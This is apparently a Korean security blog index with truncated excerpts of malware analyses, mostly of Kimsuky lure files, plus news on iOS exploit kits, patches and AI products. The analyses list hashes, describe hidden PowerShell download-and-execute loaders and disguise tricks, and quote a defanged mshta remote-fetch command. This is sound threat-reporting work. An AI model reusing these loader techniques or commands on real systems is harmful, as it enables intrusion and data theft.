오늘은 북한 김수키(Kimsuky)에서 만든 악성코드인 a.js(가칭) 에 대해 알아보겠습니다.파일명: a.js사이즈: 1 MBMD5: 927d3b32a981e6fed96c07a46ab1904eSHA-1: 97ab16b075fc1e6d9017a4a51b1d12d4f989ab56SHA-256: 010f9441add5cd1e48550a65c1496564fa62e709c7793d0ae7abee2951fc0eb5해당 악성코드는 내부 Base64 문자열을 복호화해서 PowerShell 다운로드 스크립트를 하고 PowerShell로 외부 URL에서 1.hwp를 내려받아 %TEMP%\profile.hwp로 저장하고 실행을 하고 나서 URL d(.)php에서 추가 명령을 받아 Base64 디코딩 후 execute로 즉..
DarkSword 로 명명된 iOS 기기용 새로운 익스플로잇 키트와 배포 프레임 워크가 암호화폐 지갑 앱의 데이터를 포함한 광범위한 개인 정보를 탈취하는 데 사용DarkSword는 iOS 18.4부터 18.7까지를 실행하는 아이폰을 표적으로 삼으며 이달 초 공개된 Coruna 익스플로잇 체인을 사용한 러시아계로 추정되는 UNC6353을 비롯한 여러 공격 주체와 연관되어 있음모바일 보안 기업 룩아웃(Lookout)의 연구원들은 코루나(Coruna) 공격에 사용된 인프라를 조사하던 중 다크소드를 발견구글의 위협 인텔리전소 그룹(Threat Intelligence Group)과 아이베리파이(iVerify)도 이 미확인 위협과 이를 악용하는 공격자들을 보다 포괄적으로 분석하기 위해 협력iVerify의 조사 결과..
오늘은 김수키(Kimsuky) 대외보안 0223_주미한국대사관_비공개_정책간담회_계획안 문서로 위장한 악성코드를 분석하는 시간을 가져 보겠습니다.파일명:(대외보안)0223_주미한국대사관_비공개_정책간담회_계획안.pdf.lnk사이즈:1 MBMD5:1f378c0efc13669dada1fe340c6837bdSHA-1:215343916d101c6bbe287871816e063c78103dd1SHA-256:a4f72ce8b5736fe3ca2083cfe21bd51697f12e900e307c357cb8523b8f86e3ec악성코드 분석PowerShell 명령행 인자를 보면 긴 숫자 문자열 들이 존재하고 있음.공백으로 구분된 숫자를 하나씩 읽어 byte[] 형태로 만듦2차 스크립트를 평문으로 넣지 않고 숫자 배열로 숨겨..
오늘은 페덱스(FedEx) 운송 송장으로 위장하는 피싱(Phishing) 메일 분석을 해보겠습니다. 해당 피싱 메일은 페덱스(FedEx) 운송 송장으로 위장하고 있지만 KSD(한국예탁결제원) 관계자를 대상으로 하는 피싱으로 추정이 됩니다.내용은 다음과 같습니다.FedEx Billing Online에 5013(으)로 끝나는 고객번호에 청구된 다음과 같은 청구서가 있습니다.청구서 번호 청구 날짜 청구 금액 결제 기한 953482104 2026년 2월 19일 331,070.00 KRW 2026년 3월 21일 미결제 청구서에 대한 납부를 위해 FedEx Billing Online 웹사이트에 접속해주십시오.이라고 돼 있는 것이 특징입니다.피싱 메일 분석이메일을 보면 FedEx Billing Online처럼 보이지..
마이크로소프트는 윈도우 11을 실행하는 삼성 노트북에서 C:\ 드라이브 접근을 차단하는 버그의 원인이 삼성 갤럭시 커넥트(Samsung Galaxy Connect) 앱임을 확인해당 문제 때문에 C:\에 액세스할 수 없음. 액세스 거부 오류가 발생하며 영향을 받은 사용자는 파일 열기,아웃룩(Outlook),오피스 앱, 웹 브라우저를 포함한 애플리케이션 실행, 관리자 작업 수행 등이 불가능마이크로소프트는 해당 문제가 다른 기기로 확산하는 것을 막으려고 마이크로소프트 스토어에서 삼성 갤럭시 커넥트 앱을 일시적으로 삭제삼성 노트북 윈도우 11 버그의 영향영향을 받는 기기에서는 사용자가 별도의 조처를 하지 않아도 일상적인 작업 중에 액세스 거부 오류가 발생경우에 따라 권한 오류로 말미암아 사용자가 권한을 상승시키..
오늘도 북한 김수키(Kimsuky) 에서 만든 악성코드인 Template.pdf.lnk 에 대해서 간단하게 글을 적어보겠습니다.파일명: Template.pdf.lnk사이즈:1 MBMD5:63d6052e7777d18dbc5216873badf9f6SHA-1:1011bb4de8bcf246872d45e3ba66b9ee555a7dfdSHA-256:3abed03cc4978216740f750c94d35550e60eb858e54ea5106cc340dd6c8779ce악성코드 분석1. 문자열이 의미일반 PDF의 메타데이터가 아니라 Windows Shell Link(.lnk) 파일에서 추출된 문자열 영역(StringData)LNK는 단순한 바로 가기 가 아니면 내부에는 보통 이런 정보가 들어갑니다.현재 포함된 내용대상 경로..
애플 2025년 초부터 실제 공격에 활용된 코루나(Coruna) 익스플로잇 패치코루나(Coruna) 익스플로잇 키트는 2025년 초부터 여러 공격 캠페인과 연관되어 온 것으로 밝혀졌습니다.보안 연구원들은 해당 키트가 취약한 기기에서 원격 코드 실행이나 커널 수준 권한을 획득할 수 있는 여러 익스플로잇 체인을 포함하고 있다고 밝혔습니다.애플의 업데이트는 이 프레임워크가 노린 여러 취약점을 해결CVE-2023-41974:메모리 관리 개선을 통해 커널 use-after-free 취약점 수정CVE-2024-23222:검사 기능 강화를 통해 WebKit 타입 혼동 문제 해결CVE-2023-43000:WebKit use-after-free 취약점CVE-2023-43010:WebKit 메모리 처리 결함해당 문제들 중..
오늘은 MRT(원도우 악성 소프트웨어 제거 도구) 에 대해 올바르게 알기 에 대해 글을 적어보겠습니다. 해당 글은 MRT(원도우 악성 소프트웨어 제거 도구) 에 대해서 2009년에 한 번 적었던 글이 있습니다. 해당 글을 다시 글을 적는 이유는 다음과 같습니다. 최근 유튜브 나 인스타그램,쓰레드,페이스북에 보면 윈도우에 있는 악성코드 제거 기능이라고 소개하는 영상을 보니 마치 해당 MRT(윈도 악성 소프트웨어 제거 도구)가 모든 악성코드를 탐지 및 제거를 하는 것처럼 영상이 돼 있어서 피해를 보시는 분들이 있지 않을까? 해서 글을 적게 되었습니다. 물론 그냥 있으면 되지만 앞서 이야기한 것처럼 잘못된 부분으로 피해를 최소화하기 위함입니다.MRT(원도우 악성 소프트웨어 제거 도구)를 실행을 하는 방법은 윈..
마이크로소프트는 2026년 3월 패치 화요일 취약점을 해결하기 위해 Windows 10 KB5078885 확장 보안 업데이트를 출시이번 업데이트에는 2개의 제로데이 취약점과 일부 장치의 종료 기능을 방해하는 문제가 포함Windows 10 Enterprise LTSC를 사용 중이거나 ESU 프로그램에 등록된 경우 설정으로 이동하여 Windows 업데이트를 클릭하고 수동으로 업데이트 확인을 수행하여 평소와 같이 이 업데이트를 설치할 수 있습니다.윈도우 10 KB5078885 업데이트 내용Windows 시스템 이미지 관리자: 이 업데이트는 선택한 카탈로그 파일이 신뢰할 수 있는 출처에서 왔는지 사용자가 확인할 수 있도록 경고 대화 상자를 추가파일 기록개선 사항: 제어판의 파일 기록에서 파일을 백업할 때 일부 ..
오픈 AI가 ChatGPT 성인 모드 출시를 두 번째로 연기새로운 출시 일정은 제시되지 않았다.테크크런치에 따르면 오픈AI 대변인은 액시오스와의 인터뷰에서 엔지니어들이 우선순위가 높은 작업에 집중하는 동안 출시를 미루고 있다고 밝혔다.성인 모드는 2025년 10월 샘 알트만 CEO가 처음 발표했으며 초기 목표는 2025년 12월해당 시한이 지나도 출시되지 않았다.성인 모드 계획은 유지되나 새 출시일 미정OpenAI는 이전에 성인 모드를 통해 채팅봇이 에로티카 및 기타 성인 테마 대화를 포함한 더 성숙하거나 노골적인 콘텐츠를 생성할 수 있다고 밝힌 바 있다.그러나 회사는 현재 해당 기능이 추후로 연기되고 있음을 확인업데이트된 출시 시기는 발표되지 않았다.OpenAI 대변인은 회사가 성인에게 더 유연한 콘텐..
오늘은 북한 해킹 단체 김수키(Kimsuky) 에서 만든 악성코드인 첨부_거래명세서_1473_260101_260221.lnk 에 대해서 알아보겠습니다.파일명:첨부_거래명세서_1473_260101_260221.lnk사이즈:1 MBMD5:b6473298f559113bdeb4b1676b6f90c0SHA-1:085c3681b187a1fa5684d78a78b061a0214884b5SHA-256:1fd4cdad8d32dc17513b4e4a79f42c9d616e5268d63ed497a43aea0669e50c00악성코드 분석1.주요 항목 설명namestringDocument파일을 문서처럼 보이게 하기 위한 설정AuthorsUser2.relativepath정상 파일 처럼 보이려고 메모장을 가리키고 있습니다.공격자는 자주..
보안 연구원들이 말한 바로는 한때 감시 작전에 활용되던 강력한 아이폰 해킹 프레임워크가 현재 범죄 조직에 의해 사용되어 사용자들의 암호화폐와 민감한 데이터를 탈취하고 있다고 합니다.코루나(Coruna) 로 알려진 이 익스플로잇 키트는 악성 웹사이트를 통해 취약한 아이폰을 침해할 수 있는 다중 익스플로잇 체인을 포함하는 것으로 알려졌습니다.웹킷과 구형 iOS 버전 대상구글 위협 인텔리전스 그룹과 모바일 보안 기업 아이버리파이의 분석에 따르면 해당 프레임워크는 다음을 포함5개의 완전한 익스플로잇 체인23개의 알려진 iOS 취약점애플의 여러 보안 보호 기능을 우회하는 기술이 공격은 모든 iOS 브라우저가 사용하는 브라우저 엔진인 웹킷을 노림이는 단순히 악성 웹 페이지를 방문하는 것만으로도 구형 iOS 빌드를 ..
오늘은 북한 김수키(Kimsuky)에서 만든 스마트폰 악성코드인 app-release.apk 에 대해 간단하게 분석을 해 보겠습니다.파일명:app-release.apk사이즈:2 MBMD5:69a475a90678c538beda96f4d6475334SHA-1:8f1d6de577a72cd7e3ae7ab562ed941588b3c944SHA-256:72d902a067f67efbe9c6c37a8fb08a08e6c3b7124dc03df9293a3c36886a3da6안드로이드 권한안드로이드 권한 설명READ_PRIVILEGED_PHONE_STATE IMEI, SIM 정보 등 민감한 기기 정보 접근REQUEST_IGNORE_BATTERY_OPTIMIZATIONS:배터리 최적화 무시 (백그라운드 계속 실행)POST_NOT..
오늘도 이란 반정부 시위를 악용하는 악성코드인 VID_20260114_000556_609.mp4.lnk 에 대해 글을 적어보겠습니다. 해당 악성코드는 며칠 전에 글을 적은 악성코드하고 비슷합니다.파일명:VID_20260114_000556_609.mp4.lnk사이즈:15 MBMD5:80f0dbb51081fb568943c8f2e6874873SHA-1:2b31c4858157dd37cb061ba8839aa8fd881447a8SHA-256:bd8a48d4dc71552c790a44065cce77c7592f1d00e6cbe904af01f1d164d4dd78악성코드 분석1.숨겨진 PowerShell 실행PowerShell을 숨김 상태(hidden)로 실행목적이야 다 아는 것이고사용자에게 창을 보여주지 않음백그라운드에서..
구글은 퀄컴 디스플레이 구성 요소에 존재하는 제로 데이 취약점을 포함해 총 129개의 안드로이드 보안 취약점을 패치 하는 보안 업데이트를 배포구글은 3월 20일 자 안드로이드 보안 공지에서 CVE-2026-21385가 제한적이고 표적화된 공격 대상이 될 수 있다는 징후가 있다. 고 밝혔습니다.구글은 현재 해당 취약점을 노린 공격에 대해 추가 정보를 제공하지 않았으나 퀄컴은 2월 3일 별도 보안 권고문에서 해당 결함이 그래픽스 하위 구성요소 내 정수 오버플로우 또는 랩어라운드(wraparound)로 로컬 공격자가 이를 악용해 메모리 손상을 유발할 수 있다고 합니다.퀄컴은 이런 고위험 취약점에 대해 12월 18일 구글 안드로이드 보안팀으로부터 통보를 받으며 2월 2일 고객사에 알렸다고 전했고 아직 CVE-2..
오늘은 북한 리퍼(Reaper) 에서 만든 악성코드인 EMD 영수증.lnk 에 대해 글을 적어 보겠습니다.일단 해당 악성코드는 국제법률회사 사이트를 해킹해서 EMD 영수증.pdf 파일 다운로드 해서 미끼를 보여주는 악성코드입니다.파일명:EMD 영수증.lnk사이즈:43 MBMD5:810462c085f90d745de8a253fb883160SHA-1:0e6aaedfc435dabf956cf4878022948098ac934dSHA-256:117d7bed68749479cc96f44d69426a6fa98c2d1d25946235659a800628a20db4입니다.악성코드 분석1.문자열 자르기테이블(lookup table) 기반 난독화 키%maf:~N,1% 는 maf 문자열의 N번째 문자 1개를 가져 오라고 하는 의미가..
오늘은 구글에서 제공하는 브라우저인 구글 크롬에서 구글 크롬 새로운 분할 보기 기능 추가하는 방법에 대해 알아보겠습니다.구글이 크롬에 분할 보기 (Split View) 기능을 공식 출시해당 기능은 단일 브라우저 창 내에서 두 개의 웹 페이지를 나란히 볼 수 있는 내장 방식을 제공합니다.해당 기능은 2026년 2월에 출시되었으며 구글 크롬 버전 145 이상에서 사용할 수 있습니다.별도의 창을 번갈아 사용하거나 탭을 계속 전환할 필요 없이 분할 보기 는 크롬 자체 내에서 타일 레이아웃을 생성하여 두 페이지를 같은 가로 반으로 나란히 표시분할 보기를 사용하면 하나의 창에서 두 개의 탭을 나란히 배치하여 열 수 있으며 각각 절반은 독립적인 탭처럼 작동하지만 두 탭은 함께 그룹화되어 더 쉬운 멀티태스킹을 지원해당..
구글은 자사의 이미지 생성 모델 최신 버전인 나노 바나나 2 (공식 명칭: 제미니 3.1 플래시 이미지)를 공개했습니다.해당 신형 모델은 더 빠른 이미지 생성 속도와 향상된 시각적 정확도를 약속하며 업데이트된 제미니 앱 내 기본 이미지 모델로 채택2025년 8월 출시된 최초의 나노 바나나는 제미니 내에서 수백만 장의 이미지를 생성하며 빠르게 인기를 얻었습니다.이후 11월에는 더 발전한 나노 바나나 프로 버전이 출시되었습니다.나노 바나나 2는 이제 프로 모델의 시각적 품질 대부분을 유지하면서 성능이 눈에 띄게 개선되었습니다.나노 바나나 2 더 빠른 생성 속도와 고해상도 지원 제공구글에 따르면 나노 바나나 2는 512px부터 4K 해상도까지 이미지를 생성할 수 있으며 다양한 화면 비율을 지원구글은 이 모델이..
해당 악성코드는 2025년 12월 28일부터 이란에서 일어나는 대규모 반정부 시위를 악용해서 만든 악성코드입니다. 악성코드를 실행했을 때 나오는 악성코드 사진 이미지는 2023년 반정부 시위 때 찍은 사진을 도용하고 있습니다.먼저 악성코드 해쉬는 다음과 같습니다.파일명:IMG_20260140_000315_689.exe.lnk사이즈:11 MBMD5:54c4c82d21f7b187f0426a9d0cc9ff2cSHA-1:4e2d070a5511f13adf1499a0dad8db0ba4462879SHA-256:03315debd0c7a253b59a6b447d0673aa3de84103ca3cd4d5b6148c018d90b39b그리고 해당 사진이 찍힌 날짜를 대충 검색해서 보면 이란 테헤란 이란샤르 인근 1월 19일에 촬..
오늘도 간단하게 김수키(Kimsuky) 한국 동서발전 노린 것으로 추정되는 악성코드인 Screenshot 2026-02-24 085012.scr 에 대해 글을 적어보겠습니다.파일명:Screenshot 2026-02-24 085012.scr.exe사이즈:1 MBMD5:d09c0744273355b6da719fdb62923bedSHA-1:364cc871e66afe65e1845205105c3f53f34afc01SHA-256:c089457d5f4b22313b927bb36a320f8d7a1ddb6d5b82293dc2374dcfd4b1b8b2일단 파일 확장자만 보면 SCR(Screensaver)은 화면보호기의 확장자처럼 보이지만 실제로 exe 파일입니다.일단 악성코드는 실행하면 다음과 같이 ewp(한국동서발전) 직원..
애플은 iOS 26.4 개발자 베타 2에서 아이폰과 안드로이드 기기 간 RCS 메시지에 대한 종단 간 암호화 테스트를 시작했으며 이는 크로스 플랫폼 RCS 대화 보안을 위한 첫 공개 단계애플은 개발자 베타 릴리스를 통해 애플과 안드로이드 기기 간 RCS 종단 간 암호화 테스트가 가능해졌음을 확인해당 기능은 GSMA의 RCS 유니버설 프로파일 3.0 표준을 활용하며 메시징 레이어 보안(MLS)을 통합해 서로 다른 클라이언트 간 암호화 통신을 가능하게 합니다.애플은 또한 이 기능이 베타 단계에 불과하며 현재 릴리스에는 포함되지 않을 것이라고 덧붙였습니다.RCS 종단 간 암호화는 앞으로 iOS, iPadOS, macOS 및 watchOS 26 업데이트를 통해 고객에게 제공될 예정애플과 안드로이드 간 암호화 격..
오늘도 김수키(Kimsuky) 에서 만든 악성코드인 대국민서비스관리운영체계_현장점검_증적(초안) 위장한 악성코드에 대해 알아보겠습니다. 해당 악성코드는 확장자를 .pif로 만들어져 유포되었으며 이는 EXE 확장자와 같은 실행 가능한 파일입니다. 이런 비슷한 것 분석을 한 것은 안랩 블로그 2021년 국방부 업무보고 수정 문서로 위장한 악성코드 유포라는 악성코드하고 비슷합니다.일단 악성코드 분석 코감기 때문에 대충 하는 걸로 솔직히 IDA 가지고 뜯어보아야 하는 것이 있는데 귀찮아서….파일명:대국민서비스관리운영체계_현장점검_증적(초안).pif사이즈:5 MBMD5:8983ffa6da23e0b99ccc58c17b9788c7SHA-1:01cb397c7f056516be83bef2719925d281a10858SHA..
삼성은 갤럭시 폰의 자연어 처리 능력을 업그레이드 하는 빅스비 업데이트를 발표했으며 이는 곧 열릴 갤럭시 언팩 행사에 앞서 One UI 8.5의 일부로 배포될 예정삼성 보도 자료를 보면 이제 사용자는 정확한 설정 이름이나 메뉴 구조를 알 필요 없이 자연어로 갤럭시 기기를 제어하고 탐색할 수 있게 됩니다.이번 업데이트는 사용자가 원하는 작업을 설명하거나 기기에서 발생하는 현상에 대해 질문할 수 있도록 설계되었으며 애플의 AI 어시스턴트 시리와 유사하게 관련 설정이나 작업에 직접 접근할 수 있게 해줍니다.곧 출시될 갤럭시 S26 시리즈에는 업데이트된 빅스비 경험이 탑재될 예정이며 기존 지원 갤럭시 모델들은 수동 소프트웨어 업데이트를 통해 해당 기능을 받을 수 있을 것입니다.갤럭시 기기에서 자연어 제어 기능 ..
오늘은 북한 해킹 단체인 김수키(Kimsuky) 에서 만든 악성코드인 코인 실전 트레이딩 핵심 비법서로 위장한 악성코드인 moonpeak에 대해 알아보겠습니다. 해당 악성코드는 경찰 공무원 때려치우고 억대 수익 트레이더가 된 비결 총집합이라는 내용으로 된 PDF로 돼 있습니다. MoonPeak 에 가까운 악성코드입니다. 파일명:실전 트레이딩 핵심 비법서.pdf.lnk사이즈:9 MBMD5:640f54bb6d29d98d92344136fee49d07SHA-1:ebec41675fff24858ad558429ce4e4e32c30da55SHA-256:1553bfac012b20a39822c5f2ef3a7bd97f52bb94ae631ac1178003b7d42e7b7f입니다.파일 크기로 보면 어느 정도 규모가 있는 파일인..
오늘은 북한 해킹 단체인 김수키(Kimsuky) 에서 만든 악성코드-암호.txt.lnk 에 대해 글을 적어 보겠습니다. 이번 악성코드는 분석은 너무 날로 먹는 느낌인 악성코드입니다.파일명: 암호.txt.lnk사이즈:1 MBMD5:8506cedb51cd59e549c41ccada365edeSHA-1:5787d8c9543acffceddbc76df95801e1ff96d847SHA-256:46772972037abd7eba98599a759a8560d503d035b48ab3560bda2044e052ea91입니다.악성코드 분석1.-e 옵션PowerShell 사용을 해서 -e를 사용을 하고 뒤에 붙은 Base64 실행을 합니다.2. Base64 디코딩 결과UTF-16LE로 디코딩:mshta "hxxps://link2..
오늘도 북한 정찰총국 산하의 해킹 조직인 김수키(Kimsuky)에서 만든 악성코드인 IPSInvoice.chm 에 대해 글을 적어보겠습니다.해당 악성코드는 과태료 부과 사전 통지서로 위장하고 있으면 윈도우 도움말인 chm 파일처럼 되어져 있지만, 해당 파일은 악성코드입니다.파일명:IPSInvoice.chm사이즈:1 MBMD5:3c0c63853e47c828c7168aef4114941eSHA-1:017342053e7b1ad5efcb7d6fa05500e0e3e9429bSHA-256:d46617ab7e3f8cb3402f6baff7e62f545587d2d192b8ca67c3d27b37ea186368뭐~대한민국의 민중의 지팡이 경찰청 교통? 에서 보낸 것을 되어져 있는데 타이틀 제목은 국세청고시이고 뭐~이런것은 안..
오늘도 즐겁게 북한 해킹단체 김수키(Kimsuky) 에서 통일 연구원 사칭 악성코드에 대해 알아보겠습니다.파일명:2026_0212_1281232903482939_참고자료.lnk사이즈:1 MBMD5:422a221851ea6ad15f53cd3aea51c8afSHA-1:984a98b7daeee159ea018a055b86a596c5dccc46SHA-256:a40a61e54be9cc1671ea6832fef8139ce811a7d759058bb8b4ca86863f4cc1bd분석1.파일 타입 위장사용자가 한글 문서로 착각하게 만듦2.아이콘 위장크롬 아이콘을 사용해 정상 파일처럼 보이게 함실제 동작 분석 (PowerShell 내부 동작)핵심 동작1.숫자 데이터 로드수천 개의 숫자(byte 값)가 공백으로 구분되어 있음실..
마이크로소프트는 Windows 11 메모장에서 발견된 원격 코드 실행 취약점을 수정해당 취약점은 공격자가 사용자를 속여 특별히 조작된 마크다운 링크를 클릭하도록 유도함으로써 Windows 보안 경고 없이 로컬 또는 원격 프로그램을 실행할 수 있게 했습니다.Windows 1.0 출시와 함께 마이크로소프트는 간단하고 사용하기 쉬운 텍스트 편집기인 메모장을 도입해당 메모장은 시간이 지남에 따라 빠르게 메모를 작성하거나, 텍스트 파일을 읽거나, 할 일 목록을 만들거나, 코드 편집기로 사용하기 위해 널리 사용다양한 글꼴, 크기, 굵게, 기울임, 목록과 같은 서식 도구를 지원하는 RTF(Rich Text Format) 편집기가 필요한 사용자는 Windows Write와 이후 출시된 워드패드를 사용할 수 있었습니다...
마이크로소프트는 2026년 2월 패치 화요일 취약점(6개의 제로데이 포함)을 수정하고 만료 예정인 보안 부팅 인증서 대체 작업을 지속하기 위해 Windows 10 KB5075912 확장 보안 업데이트를 출시했습니다.Windows 10 Enterprise LTSC를 사용 중이거나 ESU 프로그램에 등록된 경우, 설정으로 이동하여 Windows 업데이트를 클릭하고 수동으로 업데이트 확인 을 수행하여 평소와 같이 이 업데이트를 설치할 수 있습니다.이 업데이트 설치 후 Windows 10은 빌드 19045.6937로, Windows 10 Enterprise LTSC 2021은 빌드 19044.6937로 업데이트됩니다.Windows 10 KB5075912의 새로운 내용Microsoft는 더는 Windows 10에..
OpenAI ChatGPT 내 광고 미국 한정 테스트를 공식적으로 시작경쟁사 Anthropic이 슈퍼볼 광고에서 광고 지원형 AI 아이디어를 조롱한 지 불과 며칠 만입니다.수년간의 검토 끝에 진행되는 이번 광고 테스트는 현재 미국으로 한정되며무료 ChatGPT 계정에 로그인한 성인 사용자와 OpenAI의 신규 광고 지원형 Go 요금제 가입자에게만 적용ChatGPT Plus, Pro, Business, Enterprise, Edu 구독을 이용하는 유료 사용자에게는 광고가 표시되지 않음이번 조치는 OpenAI의 재정적 압박이 커지고 있음을 반영할 수가 있으며 인기보다, 투자자로부터 600억 달러 이상을 조달했음에도 불구하고 회사는 2030년경까지 현금 흐름이 흑자로 전환되지 않을 것으로 예상한다고 보도되었습..